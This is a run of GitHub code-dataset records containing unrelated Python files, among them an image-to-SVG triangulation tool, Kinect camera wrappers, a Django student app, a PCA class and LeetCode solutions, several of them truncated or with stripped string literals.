cli()","repo_name":"gabeduke/slogger","sub_path":"slogger/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34412580027","text":"import numpy as np\n\ndef Biaxial_Sakino_Cir(D, t, fc, fy):\n #Steel properties\n fyt = 1.08 * fy\n fyc = 0.91 * fy\n \n #Confined Concrete\n k = 4.1\n ke = 23.0\n ru = 1.67 * D**-0.112\n fcp = fc * ru\n Ec = (6.9 + 3.32 * fcp**0.5) * 1.0e3\n ec = 0.94 * fcp**0.25 * 1.0e-3\n fr = 2.0 * t * 0.19 * fy / (D - 2.0 * t)\n fre = k / ke * fr\n fcc = fcp + k * fr\n K = fcc / fcp\n if K <= 1.5:\n ecc = ec * (1.0 + 4.7 * (K - 1.0))\n else:\n ecc = ec * (3.35 + 20.0 * (K - 1.5))\n return fcc, fyc, fyt\n \n ","repo_name":"ydjiang234/Design","sub_path":"Biaxial_Sakino.py","file_name":"Biaxial_Sakino.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71660826782","text":"from algorithms import *\nfrom myGeometry import polygon_area,point\nimport numpy as np\nimport random\nfrom PIL import Image,ImageDraw\nfrom delaunay_mesh import mesh\ndef colordis(a,b):\n\treturn np.linalg.norm(np.array(a)-np.array(b))\ndef npa2tuple_color(arr):\n\treturn tuple([int(i) for i in arr])\ndef smooth_points(points,step=2.4,start=0,end=None):\n\tif(end is None):\n\t\tend=len(points)\n\t\n\tret=[]\n\twhile(startcutdown_dots):\n\t\tblur_dots*=(len(dots)/cutdown_dots)**0.5\n\t\tblur_dots=min(blur_dots,2.5)\n\t\tdots=random.sample(dots,cutdown_dots)\n\tprt('')\n\tprt('')\n\tprt('')\n\tfor loop in loops:\n\t\tarea,points,c=loop\n\t\txs=[x for x,y in points]\n\t\tys=[y for x,y in points]\n\t\tdx=max(xs)-min(xs)\n\t\tdy=max(ys)-min(ys)\n\t\taz=max(dx,dy)/((min(dx,dy)+0.1)**0.5)\n\t\tif(loop_trim and az>30):\n\t\t\tif(dx'%(c,*c[:3],loop_stroke_width*scale))\n\t\telse:\n\t\t\tprt('Z\" fill=\"RGB%s\" stroke=\"none\" />'%(c,))\n\tfor i in dots:\n\t\txy,c,rad=i\n\t\tx,y=xy\n\t\trad=rad/1.2\n\t\tprt(''%(x*scale,y*scale,rad*blur_dots*scale,*c[:3],70/blur_dots/blur_dots))\n\tfor line in lines:\n\t\tpoints,c=line\n\t\tpoints=smooth_points(points,smooth)\n\t\tprt(''%(*c[:3],100*line_alpha,1.5*scale))\n\tfor line in lines:\n\t\tpoints,c=line\n\t\tpoints=smooth_points(points,smooth)\n\t\tprt(''%(*c[:3],50*line_alpha,3*scale))\n\t\n\tprt(\"\",end='')\n\treturn out\ndx8=[1,1,0,-1,-1,-1,0,1]\ndy8=[0,1,1,1,0,-1,-1,-1]\ndxy8=[(dx8[i],dy8[i]) for i in range(8)]\ndx4=[0,0,1,-1]\ndy4=[1,-1,0,0]\ndxy4=[(dx4[i],dy4[i]) for i in range(4)]\ndef kmeans_with_kdt(k,points,n_iter=3,wei=None,progress_cb=None):\n\timport kdt\n\tdef convert(p):\n\t\tif(isinstance(p,point)):\n\t\t\treturn kdt.point(p.xy)\n\t\telse:\n\t\t\treturn kdt.point(p)\n\tn=len(points)\n\trets=random.sample(points,k)\n\tfor iter in range(n_iter):\n\t\t#print('ln109',len(rets),k)\n\t\tK=kdt.kdt()\n\t\tK.build([convert(_) for _ in rets])\n\t\tcnt=dict()\n\t\tsum=dict()\n\t\tfor idx,i in enumerate(points):\n\t\t\tif(progress_cb):\n\t\t\t\tprogress_cb((iter*n+idx)/n/n_iter)\n\t\t\tnn=K.ann1(convert(i))\n\t\t\tif(wei is None):\n\t\t\t\tcnt[nn]=cnt.get(nn,0)+1\n\t\t\t\tif(nn in sum):\n\t\t\t\t\tsum[nn]=i+sum[nn]\n\t\t\t\telse:\n\t\t\t\t\tsum[nn]=i\n\t\t\telse:\n\t\t\t\tcnt[nn]=cnt.get(nn,0)+wei[idx]\n\t\t\t\tif(nn in sum):\n\t\t\t\t\tsum[nn]=i*wei[idx]+sum[nn]\n\t\t\t\telse:\n\t\t\t\t\tsum[nn]=i*wei[idx]\n\t\trets=[]\n\t\tfor i in cnt:\n\t\t\trets.append(sum[i]/cnt[i])\n\t\tif(len(rets)0.1):\n\t\t\tenmiao=\"#\"*int(prog*width)\n\t\t\tenmiao+=\".\"*max(width-len(enmiao),0)\n\t\t\tremain=(t-first_prog[title])/(prog+1e-10)*(1-prog)\n\t\t\tprint(title,\"[\"+enmiao+\"] %.1f secs remain\"%(remain),end='\\r')\n\t\t\tlast_prog=t\n\tw,h=img.size\n\trate=(ss/w/h)**0.5\n\tsample_w,sample_h=int(w*rate),int(h*rate)\n\t\n\tsimg=img.resize((sample_w,sample_h),Image.LANCZOS)\n\t\n\tcolors=[]\n\t\n\tsample_color=int((n_colors*ss)**0.5)\n\txys=list(wh_iter(sample_w,sample_h))\n\tfor idx,xy in enumerate(random.sample(xys,sample_color)):\n\t\tif(print_progress):\n\t\t\tprogbar('sample colors',idx/sample_color)\n\t\tcolors.append(np.array(simg.getpixel(xy),np.float32))\n\t\n\tcolors=kmeans_with_kdt(n_colors,colors,progress_cb=prog_cb('merge color'))\n\timport kdt\n\tK=kdt.kdt()\n\tK.build([kdt.point(c) for c in colors])\n\tfor u in range(K.size):\n\t\tif(not K.node_points[u]):continue\n\t\tfor idx,i in enumerate(K.node_points[u]):\n\t\t\t\n\t\t\tK.node_points[u][idx].arr=tuple([int(j) for j in i.arr])\n\tsimg_arr=np.zeros((sample_w,sample_h),np.uint32)\n\tid2c=dict()\n\tfor xy in wh_iter(sample_w,sample_h):\n\t\tx,y=xy\n\t\tif(print_progress):\n\t\t\tprogbar(\"simplify image\",(y*sample_w+x)/sample_w/sample_h)\n\t\tc=simg.getpixel(xy)\n\t\tid=K.ann1(kdt.point(c)).id\n\t\t#c=npa2tuple_color(c)\n\t\tid2c[id]=c\n\t\tsimg_arr[x,y]=id\n\tif(debug):\n\t\t\n\t\tfor xy in wh_iter(sample_w,sample_h):\n\t\t\tprogbar(\"ln206\",(y*sample_w+x)/sample_w/sample_h)\n\t\t\tx,y=xy\n\t\t\tsimg.putpixel(xy,id2c[simg_arr[x,y]])\n\t\tsimg.show()\n\t\tpass\n\tpixel_group=DJS()\n\tpixel_wei=dict()\n\tall_edges=set()\n\tfor xy in wh_iter(sample_w-1,sample_h-1):\n\t\tx,y=xy\n\t\tif(print_progress):\n\t\t\tprogbar(\"join color block\",(y*(sample_w-1)+x)/(sample_w-1)/(sample_h-1))\n\t\tc=simg.getpixel(xy)\n\t\tpixel_wei[xy]=1\n\t\tfor dx,dy in [(0,1),(1,0),(1,1)]:\n\t\t\tx1,y1=x+dx,y+dy\n\t\t\tc1=simg.getpixel((x1,y1))\n\t\t\t\n\t\t\tif(simg_arr[x,y]==simg_arr[x1,y1]):\n\t\t\t\tpixel_group.join(xy,(x1,y1))\n\t\t\t\tpixel_group.find(xy)\n\t\t\t\tpixel_group.find((x1,y1))\n\t\t\telse:\n\t\t\t\tall_edges.add(xy)\n\t\t\t\tall_edges.add((x1,y1))\n\t\t\tpixel_wei[xy]+=colordis(c,c1)\n\t\n\tgroup_area=dict()\t\n\tfor xy in wh_iter(sample_w,sample_h):\n\t\tg=pixel_group.find(xy)\n\t\tgroup_area[g]=group_area.get(g,0)+1\n\t\n\tgroup_edges=dict()\n\tfor idx,xy in enumerate(all_edges):\n\t\tif(print_progress):\n\t\t\tprogbar(\"add edges\",idx/len(all_edges))\n\t\tg=pixel_group.find(xy)\n\t\tif(g not in group_edges):\n\t\t\tgroup_edges[g]=list()\n\t\tgroup_edges[g].append(xy)\n\tif(debug):\n\t\taz=Image.new(\"RGB\",simg.size)\n\t\ttmp=dict()\n\t\tfrom PIL import ImageColor\n\t\taaa=list(group_edges)\n\t\trandom.shuffle(aaa)\n\t\tfor idx,i in enumerate(aaa):\n\t\t\tH=idx*360/len(group_edges)\n\t\t\tc=ImageColor.getrgb(\"HSV(%d,100%%,100%%)\"%H)\n\t\t\ttmp[i]=c\n\t\tfor xy in wh_iter(*az.size):\n\t\t\tg=pixel_group.find(xy)\n\t\t\tc=tmp.get(g,(0,0,0))\n\t\t\taz.putpixel(xy,c)\n\t\taz.show()\n\tif(n_points is None):\n\t\tn_points=0\n\t\tfor i in group_edges:\n\t\t\tn_points+=group_area[i]**0.5\n\t\tn_points=int(max(n_points*0.5,len(group_edges)*1.5))\n\tnow_points=sum([len(group_edges[i]) for i in group_edges])\n\t_prog=0\n\trate=n_points/now_points\n\tif(rate<1):\n\t\tprint(\"merge %d points(from%d groups) into %d points\"%(now_points,len(group_edges),n_points))\n\t\tif(debug):\n\t\t\tpass\n\tpoints=list()\n\tdef upscale(p):\n\t\treturn point(p.x*w/sample_w,p.y*h/sample_h)\n\tfor i,edges in group_edges.items():\n\t\t_points=[point(x,y) for x,y in edges]\n\t\t\n\t\tle=len(_points)\n\t\tk=int(rate*le)\n\t\tif(kk):\n\t\t\t\tprint(\"wtf\")\n\t\t\t\texit()\n\t\telif(k==0):\n\t\t\t#print(\"ln242\")\n\t\t\tif(random.random()>rate):\n\t\t\t\t_points=[]\n\t\t\n\t\t_prog+=le\n\t\tif(print_progress):\n\t\t\tprogbar(\"merge points\",_prog/now_points)\n\t\tpoints.extend(_points)\n\t\n\tif(ensure_corner==True):\n\t\tfor x in [0,sample_w-1]:\n\t\t\tfor y in [0,sample_h-1]:\n\t\t\t\tpoints.append(point(x,y))\n\tenmiao=1e2\n\tpoints=list(set([point(int(p.x*enmiao),int(p.y*enmiao)) for p in points]))\n\tprint('%d points '%len(points))\n\tpoints=[point(p.x/enmiao,p.y/enmiao) for p in points]\n\tM=mesh.delaunay(points,prog_cb=prog_cb('delaunay'))\n\tif(print_progress):\n\t\tprogbar('','',print_finish=True)\n\tmx=max([i.x for i in points])\n\t\n\tloops=[]\n\ttri_points=M.get_tri_integral_point()\n\t\n\tdef get(x,y):\n\t\treturn im.getpixel((int(x),int(y)))[:3]\n\t\n\tfor abc,_pts in tri_points.items():\n\t\ta,b,c=abc\n\t\tA,B,C=M.points[a],M.points[b],M.points[c]\n\t\tif(not _pts):\n\t\t\tCC=(A+B+C)/3\n\t\t\tcolor=get(CC.x*w/sample_w,CC.y*h/sample_h)\n\t\telse:\n\t\t\t\n\t\t\tcolor=np.zeros((3,),np.float32)\n\t\t\t\n\t\t\tfor x,y in _pts:\n\t\t\t\tcolor+=np.array(get(x*w/sample_w,y*h/sample_h),np.float32)\n\t\t\tcolor=npa2tuple_color(color/len(_pts))\n\t\t\n\t\t\n\t\tloops.append((1,[upscale(A).xy,upscale(B).xy,upscale(C).xy],color))\n\treturn loops\nif(__name__=='__main__'):\n\tfrom glob import glob\n\tfrom os import path\n\timport random\n\tpth=path.dirname(__file__)\n\tims=list(glob(path.join(pth,'*.jpg')))\n\tims+=list(glob(path.join(pth,'*.png')))\n\tif(ims):\n\t\tim=Image.open(random.choice(ims)).convert(\"RGB\")\n\timport time\n\ttm=time.time()\n\tloops=img2loops(im,n_colors=32,ss=2e5,debug=True)\n\ttm=time.time()-tm\n\t\n\tww=1600\n\thh=900\n\tw,h=im.size\n\ts=ldl2svg(loops,[],[],scale=min(ww/w,hh/h))\n\tfrom os import path\n\twith open(path.join(path.dirname(__file__),'sample_loops=%d_method=main3.svg'%len(loops)),\"w\") as f:\n\t\tf.write(s)\n\tperformance=len(loops)/tm\n\tprint(\"===[time=%d seconds,\\tperformance=%d loop/sec]===\"%(tm,performance))","repo_name":"TkskKurumi/img2svg","sub_path":"main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"40986490741","text":"from sortedcontainers import SortedDict,SortedList\nfrom collections import defaultdict\nclass Solution:\n def rectangleArea(self, rectangles) -> int:\n ls =[]\n st =SortedList()\n dic=defaultdict(list)\n for a,b,c,d in rectangles:\n dic[a].append((d,-1,1))\n dic[a].append((b,1,1))\n dic[c].append((d,-1,-1))\n dic[c].append((b,1,-1))\n sm = 0\n keys = sorted(dic.keys())\n\n lastIdx =0 \n mod = 10**9+7\n ttm =0\n for k in keys:\n dic2 = defaultdict(list)\n for a,b,c in dic[k]:\n if c ==1:\n st.add((a,b))\n else:\n st.remove((a,b))\n for a,b in st:\n dic2[a].append(b)\n acc =0\n last =0\n tm =0 \n #print(dic2,st)\n for k2 in sorted(dic2.keys()):\n if acc >0:\n tm += k2 - last\n last = k2\n for b in dic2[k2]:\n acc += b \n sm += ttm * (k-lastIdx)\n lastIdx = k\n ttm = tm\n sm = sm%mod\n #print(sm,k,ttm,lastIdx)\n return sm\n\nre = Solution().rectangleArea([[25,20,70,27],[68,80,79,100],[37,41,66,76]])\n#re = Solution().rectangleArea( [[0,0,2,2],[1,0,2,3],[1,0,3,1]])\nprint(re)\n\n ","repo_name":"wherby/code","sub_path":"questions/0000/q80.py","file_name":"q80.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40441997079","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n parent = [0] + list(range(1, len(edges) + 1))\n weight = [0] + ([1] * len(edges))\n\n def get_root(v: int) -> int:\n if parent[v] == v:\n return v\n else:\n root = get_root(parent[v])\n parent[v] = root # path compression\n return root\n\n def join(v: int, u: int) -> None:\n rv, ru = get_root(v), get_root(u)\n if weight[rv] < weight[ru]:\n parent[rv] = ru\n weight[ru] += weight[rv]\n else:\n parent[ru] = rv\n weight[rv] += weight[ru]\n\n for e1, e2 in edges:\n if get_root(e1) == get_root(e2):\n # already connected:\n return [e1, e2]\n else:\n join(e1, e2)\n return []\n","repo_name":"darren-huang/leetcode-grind","sub_path":"neetcode150/11.Graphs/10.2-redundant_connections_disjoint_sets.py","file_name":"10.2-redundant_connections_disjoint_sets.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72671372062","text":"from read_file import read_file\n\n\ndef names_scores(filename):\n names = read_file(filename).sort()\n return sum((i + 1) * sum(ord(c) - ord(\"A\") + 1 for c in name) for (i, name) in enumerate(names))\n\n\nif __name__ == \"__main__\":\n print(names_scores(\"given.txt\"))\n","repo_name":"TurtleSmoke/Project-Euler","sub_path":"problems/problem_0022/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"38030213021","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Tingting Zhu\r\n@contact: tingting.zhu@eng.ox.ac.uk\r\n@reference: \r\nGPy Library https://github.com/SheffieldML/GPy\r\nGPy Document https://gpy.readthedocs.io/en/deploy/\r\n\r\n\"\"\"\r\n\r\n#%% Gaussian process classification\r\n\r\n#%% import libraries\r\n\r\nimport GPy\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef plot_gp(X, m, C, training_points=None):\r\n \"\"\" Plotting utility to plot a GP fit with 95% confidence interval \"\"\"\r\n # Plot 95% confidence interval \r\n plt.fill_between(X[:,0],\r\n m[:,0] - 1.96*np.sqrt(np.diag(C)),\r\n m[:,0] + 1.96*np.sqrt(np.diag(C)),\r\n alpha=0.5)\r\n # Plot GP mean and initial training points\r\n plt.plot(X, m, \"-\")\r\n plt.legend(labels=[\"GP fit\"])\r\n plt.xlabel(\"x\"), plt.ylabel(\"f\")\r\n \r\n # Plot training points if included\r\n if training_points is not None:\r\n X_, Y_ = training_points\r\n plt.plot(X_, Y_, \"kx\", mew=2)\r\n plt.legend(labels=[\"GP fit\", \"sample points\"])\r\n\r\n\r\n#%% draw the latent function value from a RBF kernel\r\nk = GPy.kern.RBF(1, variance=10., lengthscale=0.1)\r\nnp.random.seed(1000)\r\nX = np.linspace(0., 1., 100)[:, None]\r\nf = np.random.multivariate_normal(np.zeros(100), k.K(X,X))\r\n\r\nplt.figure(figsize=(20,10))\r\nplt.plot(X, f, 'b-')\r\nplt.title('latent function values');\r\nplt.xlabel('$x$');plt.ylabel('$f(x)$')\r\n\r\n\r\n#%% squash the latent function between [0, 1] using the probit link function\r\n\r\n# define link function\r\n\r\n# transfer f\r\n\r\n#%% draw samples form a Bernoulli distribution with success probability equal\r\n# to the transformed latent function\r\n\r\n\r\n\r\n#%% Inference via GP using expectation propagation\r\n\r\n# definea kernel to generate f\r\n\r\n\r\n# using the core GP model to tailor the desired inference method and likelihood \r\n\r\n\r\n#%% Inference via GP using Laplace\r\n\r\n# definea kernel to generate f\r\n\r\n# using the core GP model to tailor the desired inference method and likelihood \r\n\r\n\r\n# both Laplace and EP might give you different result for the hyperparameters!\r\n\r\n#%% predict using X_new\r\nX_new = np.linspace(0., 1., 50)[:, None]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"apcreagh/CDTworkshop_ML4timeseries","sub_path":"labs/lab_2/tutorial4.py","file_name":"tutorial4.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"18229042375","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nwhile True:\n ret, frame = cap.read()\n\n eyes = eye_cascade.detectMultiScale(frame, scaleFactor=1.1, minNeighbors=5)\n for(ex,ey,ew,eh) in eyes:\n cv2.rectangle(frame, (ex,ey), (ex + ew , ey + eh), (255, 0, 0), 3)\n\n cv2.imshow(\"Eye Detected\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"rattasakAong/Eyes-Detection","sub_path":"eyesdetectfull.py","file_name":"eyesdetectfull.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40757547588","text":"import logging\n\nfrom django.http import HttpResponseRedirect, HttpResponseNotFound, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom students.models import Student\n\n\ndef students(request):\n queryset = Student.objects.all().select_related('groups')\n fn = request.GET.get('q')\n if fn:\n q1 = queryset.filter(first_name__istartswith=fn)\n q2 = queryset.filter(last_name__istartswith=fn)\n q3 = queryset.filter(emails__istartswith=fn)\n queryset = q1.union(q2).union(q3)\n return render(request, 'student_list.html', context={'students_list': queryset})\n\n\ndef generate_student(request):\n student = Student.generate_student()\n return HttpResponse(f'{student.get_info()}')\n\n\ndef students_add(request):\n from .forms import StudentsAddForm\n\n if request.method == 'POST':\n form = StudentsAddForm(request.POST)\n if form.is_valid():\n form.save()\n from django.urls import reverse\n return HttpResponseRedirect(reverse('students'))\n else:\n form = StudentsAddForm()\n\n return render(request,\n 'student_add.html',\n context={'form': form})\n\n\ndef students_edit(request, pk):\n from .forms import StudentsAddForm\n try:\n student = Student.objects.get(id=pk)\n except Student.DoesNotExist:\n return HttpResponseNotFound(f'Student with id {pk} not found')\n\n if request.method == 'POST':\n form = StudentsAddForm(request.POST, instance=student)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('students-list'))\n else:\n form = StudentsAddForm(instance=student)\n\n return render(request,\n 'student_edit.html',\n context={'form': form, 'pk': pk})\n\n\ndef students_delete(request, pk):\n Student.objects.get(id=pk).delete()\n return HttpResponseRedirect(reverse('students-list'))\n\n\ndef email(request):\n from students.forms import ContactForm\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n logging.info(f\"USER CONTACTED WITH MAIL: {form.cleaned_data['email']} \"\n f\"AND SUBJECT: {form.cleaned_data['subject']}\")\n form.save()\n return HttpResponseRedirect(reverse('students-list'))\n else:\n form = ContactForm()\n\n return render(request,\n 'contact.html',\n context={'form': form})\n","repo_name":"kolesnicknick/students_tracker","sub_path":"src/students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4503653568","text":"from pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport pyk4a\nfrom pyk4a import Config, PyK4A, ColorResolution\nimport numpy as np\nimport cv2\nimport time\n\n\nclass kinect2:\n def __init__(self):\n self.cam = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Infrared | PyKinectV2.FrameSourceTypes_Depth)\n self.COLOR_HGT = self.cam.color_frame_desc.Height\n self.COLOR_WID = self.cam.color_frame_desc.Width\n self.DEPTH_HGT = self.cam.depth_frame_desc.Height\n self.DEPTH_WID = self.cam.depth_frame_desc.Width\n \n \n def read_color_frame(self):\n frame = self.cam.get_last_color_frame()\n frame_new = frame.reshape([self.COLOR_HGT, self.COLOR_WID, 4])[:, :, 0:3]\n return frame_new\n def read_depth_frame(self):\n frame = self.cam.get_last_depth_frame()\n frame_new = frame.reshape([self.DEPTH_HGT, self.DEPTH_WID])\n return frame_new\n def read_gray_frame(self):\n frame = self.cam.get_last_infrared_frame()\n frame_new = frame.reshape([self.DEPTH_HGT, self.DEPTH_WID])\n return frame_new\n\n\nclass kinect4:\n def __init__(self):\n print(\"使用pyk4a打开Kinect4\")\n self.cam = PyK4A(Config(color_resolution=ColorResolution.RES_1536P,\n depth_mode=pyk4a.DepthMode.NFOV_UNBINNED,\n synchronized_images_only=True))\n self.COLOR_HGT = 1536\n self.COLOR_WID = 2048\n self.DEPTH_HGT = 576\n self.DEPTH_WID = 640\n self.distCoeffs = np.array([0.513059, -2.77779, -0.000323, 0.000703, 1.62693, 0.391017, -2.593868, 1.548565])\n self.cameramtx = np.array([[976.405945, 0, 1020.967651],\n [0, 976.266479, 779.519653],\n [0, 0, 1]])\n self.cam.connect()\n \n \n def get_capture(self):\n img_color, img_depth = self.cam.get_capture(transform_depth_to_color=True) # Would also fetch the depth image\n if np.any(img_color) and np.any(img_depth):\n return img_color[:, :, :3], img_depth\n \n def __del__(self):\n self.cam.disconnect()\n\n\nclass kinect4_simulated:\n def __init__(self):\n print(\"假的Kinect4\")\n self.COLOR_HGT = 1536\n self.COLOR_WID = 2048\n self.DEPTH_HGT = 576\n self.DEPTH_WID = 640\n self.distCoeffs = np.array([0.513059, -2.77779, -0.000323, 0.000703, 1.62693, 0.391017, -2.593868, 1.548565])\n self.cameramtx = np.array([[976.405945, 0, 1020.967651],\n [0, 976.266479, 779.519653],\n [0, 0, 1]])\n \n def get_capture(self):\n color_filename, depth_filename = \"D:/CODE&DATA/CODE/robot_grasp/data/scene/MYDATA/rgb/0.png\", \"D:/CODE&DATA/CODE/robot_grasp/data/scene/MYDATA/depth/0.png\"\n img_color = cv2.imread(color_filename)\n img_depth = cv2.imread(depth_filename, cv2.IMREAD_ANYDEPTH)\n return img_color, img_depth\n\n\nclass BOP_simulated:\n def __init__(self):\n print(\"模拟BOP相机\")\n self.COLOR_HGT = 480\n self.COLOR_WID = 640\n self.DEPTH_HGT = 480\n self.DEPTH_WID = 640\n self.distCoeffs = np.array([0, 0, 0, 0, 0])\n self.cameramtx = np.array([572.4114, 0.0, 325.2611, 0.0, 573.57043, 242.04899, 0.0, 0.0, 1.0], dtype=float).reshape(3, 3)\n \n def get_capture(self):\n color_filename, depth_filename = \"data/scene/BOP/rgb/000000.png\", \"data/scene/BOP/depth/000000.png\"\n img_color = cv2.imread(color_filename)\n img_depth = cv2.imread(depth_filename, cv2.IMREAD_ANYDEPTH)\n return img_color, img_depth\n \ndef read_save_kinect2():\n root = \"../data/kinect2/\"\n cam = kinect2()\n cnt = 0\n skip = 20 # 跳过20帧\n while 1:\n # start = time.time()\n img_color = cam.read_color_frame()\n gray = cam.read_gray_frame()\n img_depth = cam.read_depth_frame()\n # print(\"FPS:\", 1/(time.time()-start))\n cv2.imshow(\"img_color\", img_color)\n cv2.imshow(\"gray\", gray)\n key = cv2.waitKey(500)\n skip -= 1\n if key == 115 and skip <= 0: # s键\n filename = root + \"rgb/\" + str(cnt) + \".png\"\n print(\"writing file: \", filename)\n cv2.imwrite(filename, img_color)\n filename = root + \"gray/\" + str(cnt) + \".png\"\n print(\"writing file: \", filename)\n cv2.imwrite(filename, gray)\n filename = root + \"depth/\" + str(cnt) + \".png\"\n print(\"writing file: \", filename)\n cv2.imwrite(filename, img_depth)\n cnt += 1\n\ndef read_save_kinect4():\n root = \"../data/kinect4/\"\n cam = kinect4()\n cnt = 0\n skip = 5 # 跳过20帧\n while 1:\n img_color, img_depth = cam.get_capture()\n img_depth_show = img_depth.copy()\n img_depth_show -= np.amin(img_depth_show)\n img_depth_show = img_depth_show / np.amax(img_depth_show)\n img_depth_show *= 255\n cv2.imshow(\"ir\", img_depth_show)\n cv2.imshow(\"img_color\", img_color)\n\n key = cv2.waitKey(10)\n skip -= 1\n if key == 115 and skip <= 0: # s键\n filename = root + \"rgb/\" + str(cnt) + \".png\"\n print(\"writing file: \", filename)\n cv2.imwrite(filename, img_color)\n filename = root + \"depth/\" + str(cnt) + \".png\"\n print(\"writing file: \", filename)\n cv2.imwrite(filename, img_depth)\n cnt += 1\n\ndef undistort_test():\n cam = kinect4()\n img_color, img_depth = cam.get_capture()\n \n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(cam.cameramtx, cam.distCoeffs, img_color.shape[1::-1], 1)\n map1, map2 = cv2.initUndistortRectifyMap(cam.cameramtx, cam.distCoeffs, None, newcameramtx,\n img_color.shape[1::-1], cv2.CV_32FC1)\n cameramtx = newcameramtx\n \n while 1:\n start = time.time()\n img_color, img_depth = cam.get_capture()\n print(\"read frame FPS: \", 1/(time.time() - start))\n img_depth_show = img_depth.copy()\n img_depth_show -= np.amin(img_depth_show)\n img_depth_show = img_depth_show / np.amax(img_depth_show)\n img_depth_show *= 255\n cv2.imshow(\"ir\", img_depth_show)\n cv2.imshow(\"img_color\", img_color)\n start = time.time()\n img_color_undistort = cv2.remap(img_color, map1, map2, cv2.INTER_NEAREST)\n print(\"cost time:\", time.time()-start)\n cv2.imshow(\"img_color_undistort\", img_color_undistort)\n cv2.waitKey(1)\n \n \nif __name__ == \"__main__\":\n undistort_test()\n","repo_name":"ZhangLanTao/Robot-Grab-using-PointCloud","sub_path":"hardware/camera/kinect.py","file_name":"kinect.py","file_ext":"py","file_size_in_byte":6711,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"9041382441","text":"import numpy as np\n\n\nclass PCA:\n def __init__(self, n_components: int) -> None:\n self.n_components = n_components\n self.components = None\n self.mean = None\n\n def fit(self, X):\n # mean\n self.mean = np.mean(X, axis=0)\n X = X-self.mean\n\n # covariance\n # in X row is sample && column in each feature { here we taking transpose is because in the documentation of np.cov it is the other way around ie row is feature and column is sample}\n cov = np.cov(X.T)\n\n eigen_values, eigen_vectors = np.linalg.eig(cov)\n eigen_vectors = eigen_vectors.T\n\n # sort eigenvectors\n idxs = np.argsort(eigen_values)[::-1]\n # capturing most important eigen values\n eigen_values = eigen_values[idxs]\n # eigen vectors corresponding eigen values\n eigen_vectors = eigen_vectors[idxs]\n\n # store first n eigenvectors\n self.components = eigen_vectors[:self.n_components]\n print(self.components.shape)\n print(self.mean.shape, 'mean')\n\n def transform(self, X):\n # project data\n X = X - self.mean # in the eqn of the covariance\n res = np.dot(X, self.components.T)\n self.new_mean = np.mean(res, axis=0)\n return res\n\n def inverse_transform(self, reduced_X):\n reduced_X = reduced_X - self.new_mean\n return np.dot(reduced_X, self.components)\n","repo_name":"rohit-krish/MLAlgosFromScratch","sub_path":"Dimentionality Reduction/PCA Image Reconstruction/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"11462460354","text":"### q1\ndef haveConflict(self, event1: List[str], event2: List[str]) -> bool:\n \n def gett(time):\n h,m=time.split(':')\n h=int(h)\n m=int(m)\n return h*60 + m\n \n s1 = gett(event1[0])\n e1 = gett(event1[1]) \n s2 = gett(event2[0])\n e2 = gett(event2[1]) \n \n change=defaultdict(int)\n\n change[s1]+=1\n change[e1+1]-=1\n change[s2]+=1\n change[e2+1]-=1\n \n \n # print(change)\n cur=0\n mx = 0\n for key in sorted(change.keys()):\n cur +=change[key]\n if cur==2:\n return True\n mx = max(mx, cur)\n return False\n### q2\n# greatest common factor\n# O(log(min(a, b))\ndef gcd(a, b):\n while b: \n a, b = b, a % b\n return a\n# gcd\ndef subarrayGCD(self, nums: List[int], k: int) -> int:\n def hcf(a, b):\n if(b == 0):\n return a\n else:\n return hcf(b, a % b)\n n = len(nums)\n count=0\n for i in range(n):\n num = nums[i]\n if nums[i]==k:\n count+=1\n for j in range(i+1,n):\n num = hcf(num,nums[j])\n if num==k:\n count+=1\n return count\n \n### Q3\nclass Solution:\n def minCost(self, nums: List[int], cost: List[int]) -> int:\n \n def getcost(target):\n res=0\n for i in range(len(nums)):\n res+=abs(target-nums[i])*cost[i]\n return res\n \n n = len(nums)\n l,r=1,10**6\n \n while l=1 and a< b:\n r=mid\n else:\n l=mid+1\n \n return ans\n 